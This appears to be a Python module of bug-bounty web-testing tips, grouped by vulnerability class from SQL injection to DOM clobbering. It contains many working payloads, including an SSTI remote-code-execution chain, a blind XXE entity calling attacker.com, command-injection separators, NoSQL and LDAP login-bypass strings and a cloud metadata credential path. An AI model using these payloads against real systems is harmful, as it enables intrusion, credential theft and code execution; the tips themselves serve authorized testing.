from tips._base import t

WEB_TIPS = {
    "web/sqli": [
        t("Start with polyglot probes", "Try `'`, `\"`, `')`, and `';` on every parameter — errors often reveal DB type immediately."),
        t("Use sqlmap tamper scripts", "When WAF blocks payloads: `--tamper=space2comment,between` and lower `--level` first, then increase."),
        t("Test JSON APIs", "SQLi lives in `{\"id\": \"1'\"}` bodies — Burp Intruder JSON payloads are often missed by scanners."),
        t("Union column discovery", "Use `ORDER BY 1000--` and binary search down — faster than guessing NULL count."),
        t("Report minimally", "One table name + one row beats a full dump — programs reward proof, not data hoarding.", "warning"),
    ],
    "web/xss": [
        t("Context is everything", "Payload that works in HTML breaks in attributes — tag the sink type before crafting."),
        t("Try polyglot payloads", "Use `jaVasCript:/*-/*\\`/*\\\\`/*'/*\"/**/(/* */oNcliCk=alert() )//` for filter bypass probes."),
        t("Check DOM sinks", "Search JS for `innerHTML`, `document.write`, `eval`, `setTimeout` — DOM XSS won't show in response source."),
        t("CSP bypass hunting", "Look for JSONP endpoints, AngularJS sandbox escapes, and `base-uri` gaps."),
        t("Use dalfox for speed", "Pipe URLs: `cat urls.txt | dalfox pipe -o findings.txt` after gau/katana crawl."),
    ],
    "web/ssrf": [
        t("Collaborator first", "Always confirm with Burp Collaborator or interactsh before internal scanning."),
        t("DNS rebinding", "When IP filters block `127.0.0.1`, use a rebinding service or `localtest.me` variants."),
        t("Cloud metadata paths", "AWS: `http://169.254.169.254/latest/meta-data/iam/security-credentials/` — try IMDSv2 token header too."),
        t("Gopher for Redis", "If port 6379 is open internally, gopher payloads can write SSH keys — lab only."),
        t("Blind SSRF timing", "Compare response times for open vs closed ports when no body reflection exists."),
    ],
    "web/idor": [
        t("Test every HTTP method", "IDOR on `GET /user/5` often fails on `PUT` or `DELETE` for the same ID."),
        t("UUID != secure", "Leaked UUIDs in JS bundles or emails are as bad as sequential IDs."),
        t("GraphQL global IDs", "Base64 `Type:ID` values decode to internal IDs — swap and replay."),
        t("Use Autorize extension", "Burp Autorize auto-replays low-priv requests with high-priv cookies — huge time saver."),
        t("Mass assignment combo", "Change `userId` in body while keeping attacker session — classic B2B SaaS bug."),
    ],
    "web/ssti": [
        t("Detect engine fast", "Probe `{{7*7}}`, `${7*7}`, `<%= 7*7 %>`, `#{7*7}`, `*{7*7}` in one Intruder run."),
        t("Jinja2 RCE chain", "`{{config.__class__.__init__.__globals__['os'].popen('id').read()}}` — only in authorized labs."),
        t("Blind SSTI", "Use `{# comment #}` or math expressions that change PDF/email output size."),
        t("tplmap automation", "`./tplmap.py -u URL` identifies engine and suggests exploit paths."),
        t("Check export features", "Report generators and email templates are top SSTI targets — not just search boxes."),
    ],
    "web/lfi-rfi": [
        t("php://filter trick", "`php://filter/convert.base64-encode/resource=index.php` reads source without execution."),
        t("Double encoding", "Try `..%252f..%252f` when `../` is stripped once."),
        t("Log poisoning", "Poison User-Agent in access log, then LFI `/var/log/apache2/access.log` for RCE."),
        t("Wrapper enumeration", "`php://`, `zip://`, `data://`, `expect://` — fuzz wrappers per language."),
        t("RFI needs allow_url_include", "RFI is rare on modern PHP — focus on LFI + log/session poisoning chains."),
    ],
    "web/xxe": [
        t("SVG and Office files", "Upload XXE in `.svg`, `.docx`, `.xlsx` — parsers often enable entities."),
        t("Blind XXE OOB", "Use external DTD: `<!ENTITY % xxe SYSTEM \"http://attacker.com/evil.dtd\">`"),
        t("JSON content-type swap", "Send XML body with `Content-Type: application/json` — some parsers still parse XML."),
        t("SOAP endpoints", "Legacy SOAP services are XXE goldmines — check WSDL importers."),
        t("Disable resolution test", "If entities blocked, try XInclude in non-entity contexts."),
    ],
    "web/deserialization": [
        t("Cookie and viewstate", "Java `.ser`, PHP `O:`, .NET `AAEAAAD` in cookies — decode first byte."),
        t("ysoserial gadget chains", "Match library versions exactly — CommonsCollections gadgets vary by JDK."),
        t("phpggc for PHP", "`./phpggc -l` lists chains; `./phpggc Laravel/RCE1 system id` for quick PoC."),
        t("JSON type confusion", "Some APIs deserialize JSON to objects unsafely — test `__type` or `@class` fields."),
        t("Never test prod RCE", "Deserialize RCE PoCs belong in isolated VMs matching target versions only.", "warning"),
    ],
    "web/race-condition": [
        t("Turbo Intruder settings", "Use `race.open-socket` technique and `last-byte-sync` for tight races."),
        t("python asyncio script", "Custom async scripts beat Intruder for >50 parallel requests."),
        t("Single-connection HTTP/2", "Multiplex many requests on one connection to reduce jitter."),
        t("Target limit-once ops", "Coupons, votes, transfers, password reset — anything with a single-use flag."),
        t("Record success rate", "Report '12/50 requests succeeded' — shows reliability for triage."),
    ],
    "web/open-redirect": [
        t("Bypass patterns", "Try `//evil.com`, `\\/evil.com`, `https:evil.com`, `%09evil.com`, `@evil.com`."),
        t("OAuth redirect_uri", "Open redirect + OAuth = token theft — always test login flows."),
        t("JavaScript redirects", "`?next=javascript:alert(1)` or `data:text/html` in `location=` params."),
        t("Chain to XSS", "Redirect to `javascript:` URI if scheme filter is weak."),
        t("Low severity alone", "Combine with sensitive action or OAuth for higher impact in report."),
    ],
    "web/prototype-pollution": [
        t("JSON __proto__", "Send `{\"__proto__\": {\"isAdmin\": true}}` on every JSON endpoint."),
        t("Query string pollution", "`?__proto__[isAdmin]=true` works on some Node parsers."),
        t("Client + server", "Pollute in browser for DOM XSS gadgets; pollute server for auth bypass."),
        t("ppmap scanner", "Run ppmap against Node apps after mapping routes."),
        t("Check merge libraries", "lodash `merge`, jQuery `extend`, recursive assign — grep source for usage."),
    ],
    "web/cors": [
        t("Origin reflection", "If server echoes your `Origin` header, it's likely vulnerable with credentials."),
        t("Null origin", "Sandboxed iframe sends `Origin: null` — test `null` in allow-list bypass."),
        t("Subdomain takeover + CORS", "Loose `*.domain.com` CORS fails when a subdomain is takeover-able."),
        t("HTML PoC template", "Use fetch with `credentials: 'include'` from attacker page — keep PoC minimal."),
        t("Pre-flight matters", "Sensitive methods need preflight — test PUT/DELETE cross-origin."),
    ],
    "web/clickjacking": [
        t("No X-Frame-Options", "Missing `X-Frame-Options` AND weak CSP `frame-ancestors` = test immediately."),
        t("Double-click attacks", "Some actions need double-click — design PoC overlay accordingly."),
        t("Mobile touch", "Touch events differ from mouse — test on real mobile viewport."),
        t("UI redress + CSRF", "Clickjacking bypasses CSRF tokens since user genuinely clicks."),
        t("Sensitive actions only", "Report clickjacking on money transfer, email change, 2FA disable — not static pages."),
    ],
    "web/http-request-smuggling": [
        t("HTTP/1.1 desync", "CL.TE vs TE.CL — run Burp smuggler or `python3 smuggler.py`."),
        t("HTTP/2 downgrade", "h2c smuggling when front speaks H2 and back speaks H1."),
        t("Poison admin cache", "Smuggled request can poison next user's response — high impact."),
        t("Confirm with timing", "Desync often shows as delayed or swapped responses — use multiple requests."),
        t("Document server pair", "Report exact CDN + origin versions — smuggling is stack-specific."),
    ],
    "web/web-cache-poisoning": [
        t("Param Miner extension", "Burp Param Miner finds unkeyed headers automatically."),
        t("Fat GET requests", "Some caches key on URL only — poison via unkeyed header on GET."),
        t("X-Forwarded-Host", "Classic cache poison header — reflect into HTML links."),
        t("Verify with cache buster", "Confirm poison without `cb=` param affects other users."),
        t("Purge after test", "Clear CDN cache or wait TTL after PoC to avoid harming users.", "warning"),
    ],
    "web/business-logic": [
        t("Think like a fraudster", "Negative quantities, currency switch mid-checkout, skip payment step."),
        t("Replay final API", "Call confirm-order API without prior steps — state machine bypass."),
        t("Multi-account testing", "Referral self-referral, coupon reuse across accounts."),
        t("Integer overflow", "Max int quantities and prices — especially mobile APIs."),
        t("Document $ impact", "Business logic bugs need dollar amounts in report for severity."),
    ],
    "web/crlf-injection": [
        t("Response splitting", "Inject `%0d%0aContent-Length: 0%0d%0a%0d%0a<script>alert(1)</script>`"),
        t("Header injection", "Set-Cookie injection via CRLF in redirect parameters."),
        t("Log injection", "CRLF in User-Agent pollutes SIEM — show defensive teams the log line."),
        t("URL encode variants", "Try `%0d%0a`, `%0a`, `%0d`, double encoding."),
        t("crlfuzz automation", "`crlfuzz -u URL` speeds up header injection discovery."),
    ],
    "web/command-injection": [
        t("Separator fuzzing", "`;`, `|`, `||`, `&&`, `` ` ``, `$()`, `%0a` on ping/traceroute features."),
        t("Blind detection", "`; sleep 5` or `| ping -c 5 127.0.0.1` when no output."),
        t("commix for automation", "`commix -u URL --batch` handles many injection types."),
        t("Windows vs Linux", "Use `& whoami` on Windows, `; id` on Linux — fingerprint OS first."),
        t("Argument injection", "Sometimes only arguments inject: `filename;id` vs full command."),
    ],
    "web/nosql-injection": [
        t("Auth bypass JSON", "`{\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null}}`"),
        t("Operator injection", "Fuzz `$gt`, `$regex`, `$where` in MongoDB login forms."),
        t("nosqlmap tool", "Automates MongoDB, CouchDB, and other NoSQL injection."),
        t("JavaScript in $where", "`{\"$where\": \"sleep(5000)\"}` for time-based confirmation."),
        t("Map vs reduce", "Test both API JSON bodies and URL-encoded JSON parameters."),
    ],
    "web/http-parameter-pollution": [
        t("Framework differences", "PHP uses last, ASP.NET uses first — test both orders: `id=1&id=2`."),
        t("HPP in OAuth", "Duplicate `redirect_uri` or `state` parameters confuse validation."),
        t("WAF bypass", "Split blocked keywords: `id=1&sele=id&lect` concatenated server-side."),
        t("File upload boundaries", "Duplicate `filename` in multipart — parser differential."),
        t("Document server stack", "HPP behavior is framework-specific — name it in report."),
    ],
    "web/websockets": [
        t("Origin header", "Connect with `Origin: https://evil.com` — many servers skip validation."),
        t("Replay after handshake", "Auth at handshake only? Send messages without re-auth."),
        t("Subscribe to rooms", "Join `user-123-notifications` channel without membership check."),
        t("ws-harness in Burp", "Extension replays and fuzzes WebSocket messages."),
        t("SQLi in WS messages", "Message handlers often lack sanitization — test JSON fields."),
    ],
    "web/information-disclosure": [
        t(".git exposure", "`wget -r https://target.com/.git/` or `git-dumper` for full source."),
        t("JS secrets", "Search bundles for `api_key`, `AKIA`, `Bearer`, internal URLs."),
        t("nuclei exposures", "`nuclei -t exposures/ -l urls.txt` finds common leaks fast."),
        t("Error verbosity", "Trigger errors on every parameter — stack traces leak paths and versions."),
        t("Rotate leaked keys", "Report critical leaks immediately — don't wait for full writeup.", "warning"),
    ],
    "web/ldap-xpath-injection": [
        t("LDAP auth bypass", "Username: `*)(uid=*))(|(uid=*` — classic OpenLDAP bypass."),
        t("Wildcard enumeration", "`*` in search fields returns all entries."),
        t("XPath boolean", "`' or '1'='1` in XML search APIs."),
        t("Error-based LDAP", "Verbose LDAP errors reveal DN structure."),
        t("Test SSO integrations", "LDAP backends on enterprise login portals are common targets."),
    ],
    "web/dom-clobbering": [
        t("Clobber globals", "`<a id=config href=https://evil.com>` overrides `window.config`."),
        t("Form clobbering", "Named inputs clobber `form.element` references in legacy JS."),
        t("Script gadgets", "Find sinks reading clobbered variables in third-party scripts."),
        t("DOMPurify config", "Misconfigured allow-lists may permit `id`/`name` attributes."),
        t("Combine with HTML injection", "DOM clobbering often needs some HTML injection primitive first."),
    ],
}
